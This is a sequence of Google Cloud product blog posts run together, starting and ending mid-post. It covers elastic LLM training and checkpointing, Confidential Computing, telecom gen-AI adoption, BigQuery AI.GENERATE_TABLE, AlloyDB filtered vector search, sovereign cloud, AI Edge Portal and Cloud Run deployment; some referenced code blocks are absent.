Elastic training enhances the resiliency of LLM training by enabling failure sensing and mitigation capabilities for workloads. This allows jobs to automatically continue with remediation strategies including GPU reset, node hot swap, and scaling down the data-parallel dimension of a workload to avoid using faulty nodes, thereby reducing job interruption time and improving ML Goodput. Furthermore, elastic training enables automatic scaling up of data-parallel replicas when replacement nodes become available, maximizing training throughput. 

Watch this short video to see elastic training techniques in action:

Optimized checkpointing

Sub-optimal checkpointing can lead to unnecessary overhead during training and significant loss of training productivity when interruptions occur and previous checkpoints are restored. You can substantially reduce these impacts by defining a dedicated asynchronous checkpointing process and optimizing it to quickly offload the training state from GPU high-bandwidth memory to host memory. Tuning the checkpoint frequency — based on factors such as the job interruption rate and the asynchronous overhead — is vital, as the best interval may range from several hours to mere minutes, depending on the workload and cluster size. An optimal checkpoint frequency minimizes both checkpoint overhead during training operation and computational loss during unexpected interruptions.

A robust way to meet the demands of frequent checkpointing is to leverage three levels of storage: local node storage, e.g., local SSD; peer node storage in the same cluster; and Google Cloud Storage. This multi-tiered checkpointing approach automatically replicates data across these storage tiers during save and restore operations via the host network interface or NCCL (the NVIDIA Collective Communications Library), allowing the system to use the fastest accessible storage option. By combining asynchronous checkpointing with a multi-tier storage strategy, you can achieve quicker recovery times and more resilient training workflows while maintaining high productivity and minimizing the loss of computational progress.

Watch this short video to see optimized checkpointing techniques in action :

These ML Goodput improvement techniques leverage NVIDIA Resiliency Extension, which provides failure signaling and in-job restart capabilities, as well as recent improvements to PyTorch’s distributed checkpointing, which support several of the previously mentioned checkpoint-related optimizations. Further, these capabilities are integrated with Google Kubernetes Engine (GKE) and the NVIDIA NeMo training framework, pre-packaged into a container image and available with an ML Goodput optimization recipe for easy deployment. 

Elastic training in action

In a recent internal case study with 1,024 A3 Mega GPU-accelerated instances (built on NVIDIA Hopper), workload ML Goodput improved from 80%+ to 90%+ using a combination of these techniques. While every workload may not benefit in the same way, this table shows the specific metric improvements and ML Goodput contribution of each of the techniques.

Conclusion

In summary, elastic training and optimized checkpointing, along with easy deployment options, are key strategies to maximize ML Goodput for large PyTorch Training workloads. As seen from the case study above, they can contribute to meaningful ML Goodput improvements and provide significant efficiency savings. These capabilities are customizable and composable through a python script. If you’re running PyTorch GPU training workloads on Google Cloud today, we encourage you to try out our ML Goodput optimization recipe, which provides a starting point with recommended configurations for elastic training and checkpointing. We hope you have fun building and share your feedback!

^{Various teams and individuals within Google Cloud contributed to this effort. Special thanks to – Jingxin Ye, Nicolas Grande, Gerson Kroiz, and Slava Kovalevskyi, as well as our collaborative partners – Jarek Kazmierczak, David Soto, Dmitry Kakurin, Matthew Cary, Nilay Goyal and Parmita Mehta for their immense contributions to developing all of the components that made this project a success.}

^{1. Assuming A3 Ultra pricing for 20,000 GPUs with jobs spanning 8 weeks or longer}

Confidential Computing has redefined how organizations can securely process their sensitive workloads in the cloud. The growth in our hardware ecosystem is fueling a new wave of adoption, enabling customers to use Confidential Computing to support cutting-edge uses such as building privacy-preserving AI and securing multi-party data analytics. 

We are thrilled to share our latest Confidential Computing innovations, highlighting the creative ways our customers are using Confidential Computing to protect their most sensitive workloads including AI workloads.

Building on our foundational work last year, we’ve seen remarkable progress through our deep collaborations with industry leaders including Intel, AMD, and NVIDIA. Together, we’ve significantly expanded the reach of Confidential Computing, embedding critical security features across the latest generations of CPUs, and also extending them to high-performance GPUs. 

Confidential VMs and GKE Nodes with NVIDIA H100 GPUs for AI workloads, in preview

An ongoing, top goal for Confidential Computing is to expand our capabilities for secure computation. 

We unveiled Confidential Virtual Machines on the accelerator-optimized A3 machine series with NVIDIA H100 GPUs last year, which extends hardware-based data protection from the CPU to GPUs. Confidential VMs can help ensure the confidentiality and integrity of artificial intelligence, machine learning, and scientific simulation workloads using protected GPUs while the data is in use. 

These confidential GPUs are now available in preview for Confidential VMs and for Confidential Google Kubernetes Engine (GKE) nodes. They can help create new opportunities for innovation in regulated industries and collaborative AI development. 

“AI and Agentic workflows are accelerating and transforming every aspect of business. As these technologies are integrated into the fabric of everyday operations — data security and protection of intellectual property are key considerations for businesses, researchers and governments,” said Daniel Rohrer, vice president, software product security, NVIDIA. “Putting data and model owners in direct control of their data’s journey — NVIDIA’s Confidential Computing brings advanced hardware-backed security for accelerated computing providing more confidence when creating and adopting innovative AI solutions and services.”

Confidential Vertex AI Workbench, in preview

We are expanding Confidential Computing support on Vertex AI. Vertex AI Workbench customers can now use Confidential Computing to enhance their data privacy needs, and is now in preview. This integration offers greater privacy and confidentiality with just a few clicks.

Confidential Space with Intel TDX (generally available) and NVIDIA H100 GPUs, in preview

We are excited to announce that Confidential Space is now generally available on the general-purpose C3 machine series with Intel® Trust Domain Extensions (Intel® TDX) technology, and coming soon in preview on the accelerator-optimized A3 machine series with NVIDIA H100 GPUs.

Built on our Confidential Computing portfolio, Confidential Space provides a secure enclave, also known as a Trusted Execution Environment (TEE), that Google Cloud customers can use for privacy-focused applications such as joint data analysis, joint machine learning (ML) model training or secure sharing of proprietary ML models. 

Importantly, Confidential Space is designed to protect data from all parties involved — including removing the operator of the environment from the trust boundary along with hardened protection against cloud service provider access. These properties can help organizations harden their products from insider threats, and ultimately provide stronger data privacy guarantees to their own customers.

Confidential GKE Nodes on C3 machines with Intel TDX and built-in acceleration, generally available

Confidential GKE Nodes are now generally available with Intel TDX. These nodes are powered by the general purpose C3 machine series, which run on the 4th generation Intel Xeon Scalable processors (code-named Sapphire Rapids) and have the Intel Advanced Matrix Extensions (Intel AMX) built in and on by default. 

Confidential GKE Nodes with Intel TDX offers nodes an additional isolation layer from the host and hypervisor to protect nodes against a broad range of software and hardware attacks.

“Intel Xeon processors deliver outstanding performance and value for many machine learning and AI inference workloads, especially with Intel AMX acceleration,” said Anand Pashupathy, vice president and general manager, Security Software and Services, Intel. “Google Cloud’s C3 machine series will not only impress with their performance on AI and other workloads, but also protect the confidentiality of the user’s data.”

Confidential GKE Nodes on N2D machines with AMD SEV-SNP, generally available

Confidential GKE nodes are also now generally available with AMD Secure Encrypted Virtualization-Secure Nested Paging (AMD SEV-SNP) technology. These nodes use the general purpose N2D machine series and run on the 3rd generation AMD EPYC™ (code-named Milan) processors. Confidential GKE nodes with AMD SEV-SNP provides security for cloud workloads through assurance that workloads are running and encrypted on secured hardware. 

Confidential VMs on C4D machines with AMD SEV, in Preview

The C4D machine series are powered by the 5th generation AMD EPYC™ (code-named Turin) processors and designed to deliver optimal, reliable, and consistent performance with Google’s Titanium hardware.

Today, we offer global availability of Confidential Compute on AMD machine families such as N2D, C2D, and C3D. We’re happy to share that Confidential VMs on general purpose C4D machine series with AMD Secure Encrypted Virtualization (AMD SEV) technology are in preview today, and will be generally available soon. 

Unlocking new use cases with Confidential Computing

We’re seeing impact across all major verticals where organizations are using Confidential Computing to unlock business innovations.

AiGenomix
AiGenomix is leveraging Google Cloud Confidential Computing to deliver highly differentiated infectious disease surveillance, early detection of cancer, and therapeutics intelligence with a global ecosystem of collaborators in the public and private sector.

“Our customers are dealing with extremely sensitive data about pathogens. Adding relevant data sets like patient information and personalized therapeutics further adds to the complexity of compliance. Preserving privacy and security of pathogens, patients’ genomic and related health data assets is a requirement for our customers and partners,” said Dr. Jonathan Monk, head of bioinformatics, AiGenomix.

“Our Trusted AI for Healthcare solutions leveraging Google Cloud Confidential Computing overcome the barriers to accelerated global adoption by making sure that our assets and processes are secure and compliant. With this, we are able to contribute towards the mitigation of the ever-growing risk emerging from infectious diseases and drug resistance resulting in loss of lives and livelihood,” said Dr. Harsh Sharma, chief AI strategist, AiGenomix.

Google Ads 
Google Ads has introduced confidential matching to securely connect customers’ first-party data for their marketing. This marks the first use of Confidential Computing in Google Ads products, and there are plans to bring this privacy-enhancing technology to more products over time.

“Confidential matching is now the default for any data connections made for Customer Match including Google Ads Data Manager — with no action required from you. For advertisers with very strict data policies, it also means the ability to encrypt the data yourself before it ever leaves your servers,” said Kamal Janardhan, senior director, Product Management, Measurement, Google Ads.

Google Ads plans to further integrate Confidential Computing across more services, such as the new Google tag gateway for advertisers. This update will give marketers conversion tag data encrypted in the browser, by default, and at no extra cost. The Google tag gateway for advertisers can help drive performance improvements and strengthen the resilience of advertisers’ measurement signals, while also boosting security and increasing transparency on how data is collected and processed.

Swift
Swift is using Confidential Computing to ensure that sensitive data from some of the largest banks remains completely private while powering a money laundering detection model.

“We are exploring how to leverage the latest technologies to build a global anomaly detection model that is trained on the historic fraud data of an entire community of institutions in a secure and scalable way. With a community of banks we are exploring an architecture which leverages Google Cloud Confidential Computing and verifiable attestation, so participants can ensure that their data is secure even during computation as they locally train the global model and rely on verifiable attestation to ensure the security posture of every environment in the architecture,” said Rachel Levi, head of artificial intelligence, Swift.

Expedite your Confidential Compute journey with Gemini Cloud Assist, in preview 

To make it easy for you to use Confidential Computing we’re providing AI-powered assistance directly in existing configuration workflows by integrating Gemini Cloud Assist across Confidential Compute, now in preview. 

Through natural language chat, Google Cloud administrators can get tailored explanations, recommendations, and step-by-step guidance for many security and compliance tasks. One such example is Confidential Space, where Gemini Cloud Assist can guide you through the journey of setting up the environment as a Workload Author, Workloads Operator, or a Data Collaborator. This significantly reduces the complexity and the time to set up such an environment for organizations.

Next steps

By continuously innovating and collaborating, we’re committed to making Confidential Computing the cornerstone of a secure and thriving cloud ecosystem. 

Our latest video covers several creative ways organizations are using Confidential Computing to move their AI journeys forward. You can watch it here.

The telecommunications industry is undergoing a profound transformation, with AI and generative AI emerging as key catalysts. Communication service providers (CSPs) are increasingly recognizing that these technologies are not merely incremental improvements but fundamental drivers for achieving strategic business and operational objectives. This includes enabling digital transformation, fostering service innovation, optimizing monetization strategies, and enhancing customer retention.  

To provide a comprehensive and data-driven analysis of this evolving landscape, Google Cloud partnered with Analysys Mason to conduct an in-depth study “ Gen AI in the network: CSP progress in adopting gen AI for network operations. This research examines CSPs’ progress, priorities, challenges, and best practices in leveraging gen AI to reshape their networks, offering quantifiable insights into this critical transformation. 

Key findings: A data-driven roadmap

The Analysys Mason study offers valuable insights into the current state of gen AI adoption in telecom, providing a data-driven roadmap for CSPs seeking to navigate this transformative journey:

1. Widespread gen AI adoption and future intentions

Demonstrating the strong momentum behind gen AI, 82% of CSPs surveyed are currently trialing or using it in at least one network operations area, and this adoption is set to expand further, with an additional 9% planning to implement it within the next 2 years.

2. Strategic importance of gen AI

Gen AI empowers CSPs to achieve strategic goals within the network: 57% surveyed see it as a key enabler of autonomous, cloud-based network transformation initiatives, 52% for the transition to new business models like NetCo/ServCo and more digitally driven organizations, and all with the aim of enhancing customer experience and driving broader transformation.

3. Key drivers for gen AI investment

CSPs are strategically prioritizing gen AI investments to achieve a range of network objectives, including optimizing network performance and reliability, enhancing application quality of experience (QoE), and improving network resource utilization, recognizing gen AI’s potential to move beyond a productivity tool and become a cornerstone of future network operations and automation..  

4. Challenges in achieving model accuracy

While gen AI offers significant potential, the study found that 80% of CSPs face challenges in achieving the expected accuracy from gen AI models, a hurdle that impacts use case scaling and ROI. These accuracy issues are linked to data-related problems, which many CSPs across different maturity levels are still working to resolve, and the complexity of customizing models for specific network operations.

5. Addressing the skills gap

With over 50% of CSPs citing it as a key concern, employee skillsets represent a major challenge, highlighting the urgent imperative for CSPs to invest in upskilling and reskilling initiatives to cultivate in-house expertise in AI, gen AI, and data science related fields.

6. Gen AI implementation strategies

While many CSPs begin their gen AI implementation by utilizing vendor-provided applications with embedded gen AI capabilities (the most common approach), the study emphasizes that to fully address their diverse network needs, CSPs also seek to customize models using techniques like fine-tuning and prompt engineering; this customization, however, is heavily reliant on a strong data strategy to overcome challenges such as data silos and data quality issues, which significantly impact the accuracy and effectiveness of the resulting gen AI solutions.

7. Deployment preferences

While 51% of CSPs indicated hybrid cloud environments as  the predominant deployment choice for gen AI platforms in network operations, reflecting the need for flexibility and control, a significant 39% of CSPs show a strong preference for private cloud-only deployments specifically for their data platforms, driven by the critical importance of data security and control. Public cloud deployments are preferred for AI model deployments.

Recommendations for CSPs

In summary, to secure a competitive edge, CSPs will need to prioritize gen AI use cases with clear ROI by adopting early-win gen AI use cases while developing a long-term strategy, transform their organizational structure and invest in upskilling initiatives, develop and implement a robust data strategy to support all AI initiatives and cultivate strong partnerships with expert vendors to accelerate their gen AI journey.

Google Cloud: Your partner for network transformation

Google Cloud empowers CSPs’ data-driven transformation by providing expertise in operating planetary-scale networks, a unified data platform, AI model optimization, professional services for gen AI, hybrid cloud solutions, and a rich partner ecosystem. This is further strengthened by Google Cloud’s proven success in driving network transformation for major telcos, leveraging infrastructure, platforms, and tools that deliver the required near real-time processing and scale.

To kickstart your AI-powered journey for network transformation visit Google Cloud for Telecommunications.

The explosion of digital content from social media, smartphones, and other sources has created a massive amount of unstructured data like images, videos, and documents. To help you analyze this data, BigQuery is connected with Vertex AI, Google Cloud’s powerful AI platform, so you can use advanced AI models, like Gemini 2.5 Pro/Flash, to understand the meaning hidden within your unstructured data.

Google’s advanced AI models can analyze a wide range of data formats, from text and images to audio and video. They can extract key information like names, dates, and keywords, transforming raw data into structured insights that integrate with your existing tools. Plus, with new techniques like constrained decoding, these models can even generate structured data in JSON format, helping to ensure compatibility with your workflows.

To further streamline this process, we recently added a new BigQuery feature called AI.GENERATE_TABLE(), which builds upon the capabilities of ML.GENERATE_TEXT(). This function allows you to automatically convert the insights from your unstructured data into a structured table within BigQuery, based on the provided prompt and table schema. This streamlined process allows you to easily analyze the extracted information using your existing data analysis tools.

Extracting structured data from images

Let’s dive deeper into how this new feature works with an example that uses three images. First, you have a picture of the Seattle skyline featuring the iconic Space Needle. Next, you have a city view of New York City. Finally, you have an image of cookies and flowers, which is unrelated to cityscapes.

To use these images with BigQuery’s generative AI functions, you first need to make them accessible to BigQuery. You can do this by creating a table namely “image_dataset” that connects to the Google Cloud Storage bucket where the images are stored.

Now that you’ve prepared your image data, let’s connect to the powerful Gemini 2.5 Flash model. You do this by creating a “remote model” within BigQuery, which acts as a bridge to this advanced AI.

Now, let’s use the AI.GENERATE_TABLE() function to analyze the images. You’ll need to provide the function with two things: the remote model you created (connected to Gemini 2.5 Flash) and the table containing your images.

You’ll ask the model to “Recognize the city from the picture and output its name, belonging state, brief history, and tourist attractions. Please output nothing if the image is not a city.” To ensure the results are organized and easy to use, we’ll specify a structured output format with the following fields:

• city_name (string)

• state (string)

• brief_history (string)

• attractions (array of strings)

This format, known as a schema, ensures the output is consistent and compatible with other BigQuery tools. You’ll notice that the syntax for defining this schema is the same as the CREATE TABLE command in BigQuery.

When you run the AI.GENERATE_TABLE() function, it produces a table with five columns. Four of these columns match the schema you defined (city_name, state, brief_history, and attractions), while the fifth column contains the image URI from the input table.

As you can see, the model successfully identified the cities in the first two images, providing their names and the states in which they are found. It even generated a brief history and a list of attractions for each city based on its internal knowledge. This demonstrates the power of large language models to extract information and insights directly from images.

Extracting structured data from medical transcriptions

Now let’s see another example where you can use AI.GENERATE_TABLE to extract information from unstructured data stored in a BQ managed table. We are going to use the Kaggle Medical Transcriptions dataset which contains sample medical transcriptions from various specialities. 

Transcriptions are long and verbose and have all kinds of information, e.g. a patient’s age, weight, blood pressure, conditions, etc. It is challenging and time-consuming for people to process them manually and make it well organized. But now, we can let the LLM and AI.GENERATE_TABLE help us.

Suppose you need the following information:

• age (int64)

• blood_pressure (struct<high int64, low int64)

• weight (float64)

• conditions (array of strings)

• diagnosis (array of strings)

• medications (array of strings)

We can come up with this SQL query:

You can see that the model successfully extracted the information from the medical transcriptions and the results are organized as the schema specified with the help of AI.GENERATE_TABLE.

The AI.GENERATE_TABLE() function can help you transform your data and create a BigQuery table for easy analysis and integration with your existing workflows. To learn more about the full syntax, refer to the documentation. Have feedback on these new features or have additional feature requests? Let us know at bqml-feedback@google.com.

If you’re building a generative AI application or an AI agent, there’s a high likelihood you’ll need to perform simultaneous searches on structured and unstructured data. For example, the prompt “Show me all pictures of sunsets I took in the past month” includes a structured part (the date is within the past month) and an unstructured part (the picture contains a sunset). In recent years, modern relational databases such as AlloyDB for PostgreSQL have added vector search capabilities to cover the unstructured part.

At Google Cloud Next 2025, we announced a series of key innovations in AlloyDB AI’s ScaNN index to improve performance and quality of search over structured and unstructured data. By deeply integrating with the AlloyDB query planner, the ScaNN index is able to optimize the ordering of SQL filters in vector search based on your workload characteristics. Let’s dive into what filter selectivity is and how AlloyDB ScaNN’s index leverages it to improve the performance and quality of your search.

Filtered vector search

To illustrate the power of filtered vector search in AlloyDB, imagine you’re an online retailer managing a product catalog within AlloyDB. With more than 100,000 items, this product catalog includes references to images, textual descriptions, inventory information, and catalog metadata in your products table.

To search through this data, you can leverage vector search with SQL filters to enable search across unstructured and structured data, providing users with higher quality search results. In the metadata, there may be fields such as color, gender, size and price stored in your table that you can leverage as search filters.

Say a user searches for a “maroon puffer jacket”. You might use “maroon” as a filter and “puffer jacket” as the part of the query upon which you perform a vector search. So you might have a SQL statement like:

In the products table, we have set a vector index on our text_embedding column and a B-tree index on our metadata column, color.

Depending on how commonly maroon appears in the color column of the dataset, which is called selectivity in database terminology, the AlloyDB query planner may choose to apply the filter before, after, or in-line with the vector search query. Let’s dive into why the planner may choose one option over the other. 

High selectivity

When a filter is highly selective, it means that only a small percentage of your data meets the specified criteria. In our example, “maroon” is a rare color, with only 0.2% of the 100,000 products in the catalog being that color. 

In cases where we have highly selective filters, the AlloyDB query planner often chooses to apply a pre-filter, i.e, applying the filtering conditions prior to the vector search. In our example, we would apply our filter condition WHERE color=’maroon’ before the vector search. Since “maroon” is rare, the B-tree index on the color column efficiently identifies a small subset of products (e.g., 200 out of 100,000). Subsequently, the computationally intensive vector search is performed only on this significantly reduced set of candidates. This strategy utilizes a K-Nearest Neighbors (KNN) vector search, which delivers results with 100% recall, i.e., the exact closest neighbors, within the set of results after the filter is replied.

Low selectivity

Conversely, if the filter isn’t highly selective (e.g., if 90% of products are “blue”), pre-filtering is inefficient because it doesn’t significantly narrow down the search space. In such cases, when a large proportion of your data satisfies the filtering conditions, a filter is considered to have low selectivity.

Say you’re searching for “blue puffer jackets”; if 90% of our catalog is blue, applying the filter first isn’t beneficial because it doesn’t narrow down our list of candidates all that much. If you applied a pre-filter, you would end up performing a KNN vector search against the majority of the dataset, which would be computationally expensive. Therefore, the AlloyDB query planner would choose to apply a post-filter.

Post-filtering means performing the vector search first, leveraging an Approximate Nearest Neighbors (ANN) vector index such as ScaNN on the text_embedding column to quickly identify a set of candidate results. Only after retrieving these initial candidates — the top 100 based on vector similarity — is the filter condition, WHERE color=’blue’, applied.

If your filter had high selectivity, there’s a risk this approach would yield very few candidates meeting your filter criteria. However because the condition WHERE color=’blue’ has low selectivity, you would likely obtain the approximate top-100 results. In the unlikely case you do not retrieve 100 results, the vector search would need to perform additional scans on the vector index to retrieve more candidates until the desired limit was reached. While effective for filters with low selectivity, post-filtering can become less efficient with highly selective filters, as the vector index might need to scan through many non-matching candidates.

Medium selectivity

When a filter has medium selectivity, the AlloyDB query planner may choose to apply either a pre-filter or a post-filter. However in cases of medium selectivity that range from 0.5-10% selectivity (such as, say, the color “purple”), AlloyDB supports a method called inline filtering, or in-filtering. Inline filtering applies the filter conditions in tandem with the vector search. With in-line filtering, AlloyDB leverages a bitmap from a B-tree index to select candidates matching the filter condition in tandem with the vector search in one pass. 

So in this example, while the plan evaluates which candidates are purple, AlloyDB is simultaneously searching for the approximate neighbors of the search query against items in the data catalog. This approach balances the benefits of reducing the search space, as pre-filtering does, without the risk of returning too few results, a potential issue with post-filtering when combined with a highly selective filter. 

Adaptive filtration

While the cases detailed above seem to clearly partition the search space across three different kinds of filtering, in practice it’s not so simple. At times the query planner may misjudge the selectivity of a filter due to outdated statistics, resulting in the vector search and filtering conditions being applied in a suboptimal order, for less high-quality results. This is where AlloyDB ScaNN’s latest innovation, adaptive filtration, comes in. With adaptive filtration, AlloyDB learns the selectivity of your filters at query time based on actual observed statistics and can adaptively change its execution plan. This results in more optimal ordering of filters and vector search, and greatly mitigates cases of planner misestimations. 

In summary, real-world workloads are complex, and distinct filtering conditions have different selectivities that may change over time as your data and workloads grow. That’s where an intelligent database engine powering your vector search can make a difference — by optimizing and adapting filtering for your workload, helping to ensure consistently high-quality and performant search results as your data evolves.

Get started today

Get started with vector search leveraging AlloyDB’s ScaNN index today. Then, learn how you can use AlloyDB AI’s latest features to power multimodal vector search. Adaptive filtration is available in preview; get started by turning on the feature flag. 

You can also sign up for a 30-day AlloyDB free trial.

Like most organizations, Google Cloud is continually engaging with customers, partners, and policymakers to deliver technology capabilities that reflect their needs. When it comes to digital sovereignty solutions, Google Cloud has worked with customers for nearly a decade. 

Today, we’re pleased to announce significant technical and commercial updates on our sovereign cloud solutions for customers, and details on how we’re helping them achieve greater control, choice, and security in the cloud — without compromising functionality. 

Building on the first sovereign solutions we introduced years ago, we’ve massively scaled our infrastructure footprint globally, now consisting of more than 42 cloud regions, 127 zones, 202 network edge locations, and 33 subsea cable investments.

We have also forged key partnerships in Asia, Europe, the Middle East, and the United States to help deliver these sovereign solutions, including Schwarz Group and T-Systems (Germany), S3NS (France), Minsait (Spain), Telecom Italia (Italy), Clarence (Belgium and Luxembourg), CNTXT (Saudi Arabia), KDDI (Japan), and World Wide Technology (United States). 

A commitment to customer choice

Digital sovereignty is about more than just controlling encryption keys. At its core, it’s about giving customers the flexibility their global businesses require. It’s about enabling them to operate on multiple clouds. And it’s about securing data with the most advanced technologies.

We’ve long been committed to enabling customers to choose the cloud provider and solution that best fit their needs, and not locking them into a single option. Sovereignty in the cloud is not one-size-fits-all. We offer customers a portfolio of solutions that align with their business needs, regulatory requirements, and risk profiles. 

Our strong contractual commitments to our customers are backed by robust sovereign controls and solutions that are all available today. Our updated sovereign cloud solution portfolio includes:

• Google Cloud Data Boundary gives customers the ability to deploy a sovereign data boundary and control where their content is stored and processed. This boundary also allows customers to store and manage their encryption keys outside Google’s infrastructure, which can help customers meet their specific data access and control requirements no matter what market.

  Google Cloud Data Boundary customers have access to a large set of Google Cloud products, including AI services, and can enable capabilities, including Confidential Computing and External Key Management with Key Access Justifications to control access to their data and deny access for any reason.

  In addition, Google Workspace customers can take advantage of Google Cloud Data Boundary’s sovereign controls to limit the processing of their content to the United States or EU, choose a country to locally store data, and use client-side encryption to prevent unauthorized access (even by Google) to their most critical content.

  Today, we are also announcing User Data Shield, a solution that adds Mandiant services to validate the security of customer applications built on top of Google Cloud Data Boundary. User Data Shield provides recurring security testing of customer applications to validate sovereignty postures. 

• Google Cloud Dedicated delivers a solution designed to meet local sovereignty requirements, enabled by independent local and regional partners. As an example, Google Cloud has partnered with Thales since 2021 to build a first-of-its-kind Trusted Cloud by S3NS for Europe.

  This offering with Thales is designed to offer a rich set of Google Cloud services with GPUs to support AI workloads and is operated by S3NS, a standalone French entity. Currently in preview, S3NS’ solution is designed to meet the rigorous security and operational resilience requirements of France’s SecNumCloud standards. We are expanding our Google Cloud Dedicated footprint globally, launching next in Germany.

  “For France to truly embrace digital sovereignty, it is essential to have a cloud solution that marries the immense power of hyperscale technology with the strictest local security and operational controls. S3NS is committed to providing French organizations with access to advanced cloud services, including critical AI capabilities, all operated within France by a European operator to meet and exceed the rigorous SecNumCloud standards,” said Christophe Salomon, EVP, Information Systems and Secured Communication, at Thales.

• Google Cloud Air-Gapped offers a fully standalone and air-gapped solution that does not require connectivity to an external network. This solution is tailored for customers in the intelligence, defense, and other sectors with strict data security and residency requirements. The air-gapped solution can be deployed and operated by Google, the customer, or a Google partner.

  It is built with open-source components and comes with a targeted set of AI, database, and infrastructure services. Because air-gapped solutions run on open-source components, they are designed to provide business continuity and survivability in the event of service disruptions. Google Cloud Air-Gapped received authorization in 2024 to host U.S. government Top Secret and Secret-level data.

  “Working with Google Cloud to introduce sovereign offerings can give our joint clients greater control, choice, and security in the cloud, without compromising the functionality of their underlying cloud architectures,” said Scott Alfieri, Senior Managing Director and Google Business Group Lead at Accenture. “Google Cloud’s extensive global infrastructure, coupled with Accenture’s transformation and industry expertise, helps organizations build an agile and scalable foundation, unlocking opportunities for growth and continuous innovation.”

Local control, global security

Security and sovereignty are two sides of the same coin. Local control of data and operations can provide customers a greater level of confidence in their security, but it’s also true that no organization can be considered sovereign if dependencies on legacy infrastructure leave its data vulnerable to loss or theft. 

Analysis from the Google Threat Intelligence Group and Google Cloud’s Office of the CISO suggests that the global cyber threat landscape will only become more complex as malicious actors tap into AI-powered tools and techniques to prey on older software products, platforms, and outdated infrastructures.

With Google Cloud, customers not only get sovereign solutions, but also gain access to our leading security capabilities. This includes our rigorous focus on secure by design technology and deep expertise from Google Threat Intelligence Group and Mandiant Consulting, who operate on the frontlines of cyber conflicts worldwide and maintain trusted partnerships with more than 80 governments around the world. 

In addition, Google Cloud CyberShield provides AI and intelligence-driven cyber defense to help governments defend against threats at national scale. And Mandiant Managed Defense services make it easy for customers worldwide to extend their security teams with our security team. 

Google Sovereign Cloud solutions ultimately enable customers to leverage the secure foundation of Google Cloud, while gaining access to advanced security features — such as Confidential Computing, Zero Trust, post-quantum cryptography, and AI-powered platform defenses — faster and more cost-effectively than they could achieve on their own.

Sovereign solutions for any organization

We remain dedicated to fostering an environment of trust and control for our customers, empowering organizations globally to navigate the complex landscape of digital sovereignty with confidence. We continue to work with customers, partners, and policymakers around the world to refine our sovereign cloud offerings and deliver technologies that address their needs. 

To learn more about how we are enabling our customers’ digital sovereignty capabilities, visit our web page or contact your account manager.

Today, we’re excited to announce Google AI Edge Portal in private preview, Google Cloud’s new solution for testing and benchmarking on-device machine learning (ML) at scale. 

Machine learning on mobile devices enables amazing app experiences. But how will your model truly perform across the vast, diverse, and ever-changing landscape of mobile devices? Manually testing at scale – across hundreds of device types – is a laborious task that often requires a dedicated device lab. It’s slow, prohibitively expensive, and often out of reach to most developers, leaving you guessing about performance on users’ devices and risking delivering a subpar user experience.

Google AI Edge Portal solves the above challenges, enabling you to benchmark LiteRT models so you can find the best configuration for large-scale deployment of ML models across devices. Now, you can:  

• Simplify & accelerate testing cycles across the diverse hardware landscape: Effortlessly assess model performance across hundreds of representative mobile devices in minutes.

• Proactively assure model quality & identify issues early: Pinpoint hardware-specific performance variations or regressions (like on particular chipsets or memory-constrained devices) before deployment.

• Lower device testing cost & access latest hardware: Test on diverse and continually growing fleet of physical devices (currently 100+ device models from various Android OEMs) without the expense and complexity of maintaining your own lab.

• Unlock powerful, data-driven decisions & business intelligence: Google AI Edge Portal delivers rich performance data and comparisons, providing the crucial business intelligence needed to confidently guide model optimization and validate deployment readiness.

In this post, we’ll share how our partners are already using Google AI Edge Portal, the user journey, and how you can get started. 

What our partners are saying

We’ve been fortunate to work with several innovative teams during the early development of Google AI Edge Portal. Here’s what a few of them had to say about its potential:

How Google AI Edge Portal helps you benchmark your LiteRT models

1. Upload & configure: Upload your model file via the UI or point to it in your Google Cloud Storage bucket.

2. Select accelerators: Specify testing against CPU or GPU (with automatic CPU fallback). NPU support is planned for future releases.

3. Select devices: Choose target devices from our diverse pool using filters (device tier, brand, chipset, RAM) or select curated lists with convenient shortcuts.

From there, submit your job and await completion. Once ready, explore the results in the Interactive Dashboard:

• Compare configurations: Easily visualize how performance metrics (e.g., average latency, peak memory) differ when using different accelerators across all tested devices.

• Analyze device impact: See how a specific model configuration performs across the range of selected devices. Use histograms and scatter plots to quickly identify performance variations tied to device characteristics.

• Detailed metrics: Access a detailed, sortable table showing specific metrics (initialization time, inference latency, memory usage) for each individual device, alongside its hardware specifications.

Help us shape the future of Google AI Edge Portal

Your feedback is crucial as we expand availability and enhance capabilities based on developer needs. In the future, we are keen to explore integrating features such as:

• Bulk inference & evaluation: Run your models with custom datasets on diverse devices to validate functional correctness and enable qualitative GenAI evaluations.

• LLM benchmarking: Introduce dedicated workflows and metrics specifically tailored for benchmarking the unique characteristics of large language models on edge devices.

• Model optimization tools: Explore integrated tooling to potentially assist with tasks like model conversion and quantization within the portal.

• Expanded platform & hardware support: Work towards supporting additional accelerators like NPUs, and other platforms beyond Android in the future.

Join the Google AI Edge Portal private preview

Google AI Edge Portal is available starting today in private preview for allowlisted Google Cloud customers. During this private preview period, access is provided at no charge, subject to the preview terms.

This preview is ideal for developers and teams building mobile ML applications with LiteRT who need reliable benchmarking data across diverse Android hardware and are willing to provide feedback to help shape the product’s future. To request access, complete our sign-up form here to express interest. Access is granted via allowlisting. 

We are committed to making Google AI Edge Portal a valuable tool for the entire on-device ML community and we look forward to your feedback and collaboration!

Cloud Run has become a go-to app hosting solution for its remarkable simplicity, flexibility, and scalability. But the age of AI-assisted development is here, and going from idea to application is faster and more streamlined than ever. Today, we’re excited to make AI deployments easier and more accessible by introducing new ways to deploy your apps to Cloud Run:

1. Deploy applications in Google AI Studio to Cloud Run with a single button click

2. Scale your Gemma projects with direct deployment of Gemma 3 models from Google AI Studio to Cloud Run 

3. Empower MCP-compatible AI agents to deploy apps with the new Cloud Run MCP server

1. Streamlining app development and deployment with AI Studio and Cloud Run

Google AI Studio is the fastest way to start building with Gemini. Once you develop an app in AI Studio, you can deploy it to Cloud Run with a single button click, allowing you to go from code to shareable URL in seconds (video at 2x speed):

Once deployed, the app is available at a stable HTTPS endpoint that automatically scales, including down to zero when not in use. You can re-deploy with updates from AI Studio, or continue your development journey in the Cloud Run source editor. Plus, your Gemini API key remains securely managed server-side on Cloud Run and is not accessible from the client device.

It’s also a very economical solution for hosting apps developed with AI Studio: Cloud Run has request-based billing with 100ms granularity and a free tier of 2 million requests per month, in addition to any free Google Cloud credits.

2. Bring your Gemma app to production in a click with Cloud Run

Gemma is a leading open model for single-GPU performance. To help you scale your Gemma projects, AI Studio now enables direct deployment of Gemma 3 models to Cloud Run:

